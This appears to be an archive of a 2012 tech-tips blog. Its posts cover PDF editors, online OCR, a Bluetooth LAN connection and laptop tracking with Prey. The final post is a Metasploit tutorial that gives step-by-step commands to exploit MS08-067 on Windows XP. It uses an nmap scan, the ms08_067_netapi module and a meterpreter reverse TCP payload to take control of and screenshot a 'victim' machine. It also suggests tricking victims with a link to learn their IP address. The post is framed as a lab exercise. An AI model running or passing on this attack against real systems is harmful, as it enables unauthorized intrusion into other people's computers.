Sunday, 22 July 2012

How To Edit PDF Files


You’re probably sometimes downloaded a pdf document that you need to edit, it can be tricky because PDF files are “read only” by default. There are ways by which you can edit a PDF document for free .To help you out, I decided to provide you the list of top 3 free PDF editing software. Let’s begin with it.

1) Nitro PDF Professional

Nitro PDF Professional is PDF editor e that allows you to create, convert, edit, combine, secure, annotate, form-fill, and save 100% industry-standard PDF files… It worth to have ! Below you can download Nitro PDF Professional.
Features
-Create PDF
- Edit PDF
- Convert PDF
- Review & annotate PDF
- PDF forms
- Secure PDF
- Assemble & combine PDF

2) PDF-XChange Viewer

PDF-XChange Viewer is a free PDF editor/reader that allows you to view and edit PDFs, all from within an attractive and intuitive interface.

3) Inkscape

Inkscape is an open source vector graphics editor that can natively import and export PDF content.

How To Convert Image With Text Content Into Text Document


Want to to get rid of rewriting text files that was printed ? In this post I’m going to show you how to convert image with text Content into text document (.doc) by using free online service called onlineocr . It recognize text and characters from PDF scanned documents (including multipage files), photographs and digital camera captured images. Free Online OCR service supports 32 recognition languages.
1. Go to onlineocr.net
2. Choose file that you want to convert and click on Upload

3. Select language , output format and click on Recognize
4. After few seconds you’ll be able to download converted document

Thursday, 19 July 2012

How To Setup Direct LAN Connection Using Bluetooth


You may come in the situation when you’ve two computer but no WiFi adapters in it. In such condition you can try cheap method to share files between two computers using Bluetooth. In this tutorial I am going to teach you how to achieve such heights.
To allow file and printer sharing, name each computer with a unique name but give both computers the same workgroup name. You can do this from the System Properties window. To open System Properties, go to My computer, right click on any blank area and choose properties. Or simply you can right click on my computer icon and choose properties.
In Computer Name tab click Change to input your computer name and workgroup name. You will be asked to restart your computer after the computer name and workgroup change.
The computer name defined in this step becomes the Bluetooth device name for this computer that will be displayed on another computer this computer is discovered.
Now plug in Bluetooth adapters to both of your computer. Make sure that Bluetooth device is properly installed on both of your PC’s properly by going to device manager.
Verify that the Bluetooth adapter is identified as a Bluetooth Network Connection under Personal Area Network with Microsoft’s Bluetooth stack driver while on the second computer with third-party Bluetooth stack driver; it is identified as a Local Area Connection under LAN or High-Speed Internet.
Make the second Bluetooth-enabled computer discoverable by going to Bluetooth settings and configure its “service properties” to include PAN Networking service.
In the first computer, right click on Bluetooth taskbar icon and select “Join a Personal Area Network” to open Bluetooth Personal Area Network window.
You can also do this by going to Network Connections and right-clicking the icon and select “View Bluetooth Network Devices” or clicking View Bluetooth Network Devices link on the left sidebar.
On the Bluetooth Personal Area Network window, click “Add” to open the “Add Bluetooth Device Wizard” if the second computer hasn’t been connected before.
Now we’re done with setting up the basic things. Now we’ll have to pair the devices.
On the Add Bluetooth Device Wizard, tick “My device is set up and ready to be found”. Click Next.
Wizard will search for Bluetooth devices in range.
Select the second computer and click next.
You will be asked to input a passkey or PIN code before starting a connection to the second computer. You can create your own passkey or let Windows create a random passkey for you. Click Next.
On the second computer, you will be prompted to input a passkey. Type the same passkey as the one created on the first computer and cick OK.
If the everything went well, you’ll be welcomed to next page with Finish button enabled. Click Finish. You will be back to the Bluetooth Personal Area Network window. Now the second computer is listed under Direct Connections. Select it and click Connect to start a Personal Area Network connection.
Now, both computers have been directly connected in a Personal Area Network. First computer with Microsoft stack is the Client while the second one with Thirdparty stack is the host.
Now you can share files same like in LAN but with slower bandwidth
Hope this tutorial was helpful

How to track your stolen laptop for free


In this post I will show you how to use free software called Prey , that allows you to remotely monitor your stolen laptop, retrieving screenshots, webcam pictures, and Wi-Fi hotspot information that you (and the police) can use to track down your property.
1) Download Prey from this LINK and install it on your laptop .
2) After installation you’ll received activation email , click on activation link
3) If your laptop is stolen , then log in in your Prey account and select Missing option on YES , it informs Prey to generate and send a report next time it runs.
Reports contains geo-location of your stolen laptop , the network status , such as the device’s MAC and it’s public and private IP addresses and more..

Saturday, 14 July 2012

[Metasploit Tutorial] Hacking Windows XP using IP Address

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.


We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.